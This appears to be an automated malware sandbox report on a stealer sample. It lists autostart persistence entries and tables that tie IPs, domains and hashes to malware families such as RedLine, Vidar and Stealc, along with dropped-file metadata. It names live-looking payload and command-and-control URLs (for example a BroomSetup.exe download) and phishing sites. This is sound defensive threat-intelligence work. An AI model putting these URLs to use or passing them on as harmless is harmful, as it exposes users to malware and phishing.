                                                                                                              • Excluded IPs from analysis (whitelisted): 52.165.165.26, 72.21.81.240, 20.3.187.198, 192.229.211.108, 20.242.39.171, 20.12.23.50, 142.250.65.206, 23.41.168.93, 142.251.40.227, 142.251.163.84, 34.104.35.123, 23.51.58.94, 40.126.24.146, 40.126.24.147, 20.190.152.22, 40.126.24.149, 40.126.24.148, 40.126.24.82, 20.190.152.21, 20.190.152.19, 20.190.152.20, 40.126.24.83, 40.126.24.81
                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              TimeTypeDescription
                                                                                                              01:20:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT6C30.tmp
                                                                                                              01:20:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
                                                                                                              02:20:15API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                              02:20:28API Interceptor360x Sleep call for process: MSBuild.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              185.172.128.90VucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
                                                                                                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                              g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                              QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                              185.172.128.228VucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.228/BroomSetup.exe
                                                                                                              QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.228/ping.php?substr=seven
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              fp2e7a.wpc.phicdn.nethttps://thehitchhouse.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://friwin2.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://ai7wzovlc.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              VucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://svuch3d.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://rlx10ld2n.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://htceram.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://ixkv5pf.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://www.steampowered.solutions/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              https://verfolgung-lieferung.net/Get hashmaliciousUnknownBrowse
                                                                                                              • 192.229.211.108
                                                                                                              iolo0.b-cdn.netVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.93.1.247
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 169.150.236.100
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 195.181.163.193
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 156.146.43.65
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 195.181.163.196
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 195.181.163.196
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 195.181.163.195
                                                                                                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 169.150.236.98
                                                                                                              g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 169.150.236.97
                                                                                                              j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.93.1.251
                                                                                                              svc.iolo.comVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              note.padd.cn.comVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              g77dRQ1Csm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 176.97.76.106
                                                                                                              QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 176.97.76.106
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              NADYMSS-ASRUVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              3R18jv6iGv.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              YEnIrzZUUw.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              bUcIhJ4VHm.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.76
                                                                                                              NADYMSS-ASRUVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              3R18jv6iGv.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              YEnIrzZUUw.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              bUcIhJ4VHm.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.76
                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUShttps://friwin2.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                              • 13.107.213.40
                                                                                                              https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.107.246.70
                                                                                                              VucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              https://pub-9d425aa9335c4307a502c0721d499bdd.r2.dev/officemm.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.107.213.40
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              https://document.mamabiller59.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.107.246.38
                                                                                                              https://sgusa3.sharepoint.com/:f:/s/ESSExternalPortal/Ep2vdkaY-f5IstEbB83tCgcBs_cKepSlCQGqJ92Z-gw5uQ?xsdata=MDV8MDJ8bW1leWVyc0BidXJuc21jZC5jb218OWZhZmYwM2M2MThiNGMzMmI4NjYwOGRjNjYyZjk3YWR8YmZiYjlhMmI2ZDk5NGU3OGIzYzc5NTAwNWQ1NTVjOGJ8MHwwfDYzODQ5NzYwMTc5ODA4MjQwNHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=bngyZ1FROWtWMzlEWlhCYjlhRkpvV0dHeHJKK2JGZG9MckVVMGFjcHpYYz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.107.136.10
                                                                                                              https://qdorbb80j410g85n.azureedge.net/010au/Get hashmaliciousTechSupportScamBrowse
                                                                                                              • 13.107.213.70
                                                                                                              https://worker-curly-silence-18d1.pistisarte.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.107.213.40
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 20.157.87.45
                                                                                                              NADYMSS-ASRUVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 185.172.128.59
                                                                                                              3R18jv6iGv.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              YEnIrzZUUw.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.111
                                                                                                              bUcIhJ4VHm.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                              • 185.172.128.76
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              28a2c9bd18a11de089ef85a160da29e4https://thehitchhouse.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://friwin2.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              VucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://htceram.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://www.steampowered.solutions/Get hashmaliciousUnknownBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://wall.page/jcw7sZGet hashmaliciousUnknownBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              PdfConverters.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              https://pub-9d425aa9335c4307a502c0721d499bdd.r2.dev/officemm.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              SecuriteInfo.com.Heuristic.HEUR.AGEN.1362051.12742.9223.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 169.150.236.99
                                                                                                              • 173.222.162.32
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\ProgramData\freebl3.dllVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                  wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                      file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                        JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                          file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                              QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                3R18jv6iGv.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                  C:\ProgramData\mozglue.dllVucRf0jboS.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                    kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                      wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                          file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                            JHqNlw9U8c.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                              file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  QPoX60yhZt.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                    3R18jv6iGv.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40960
                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.68639364218091
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                      MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                      SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                      SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                      SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
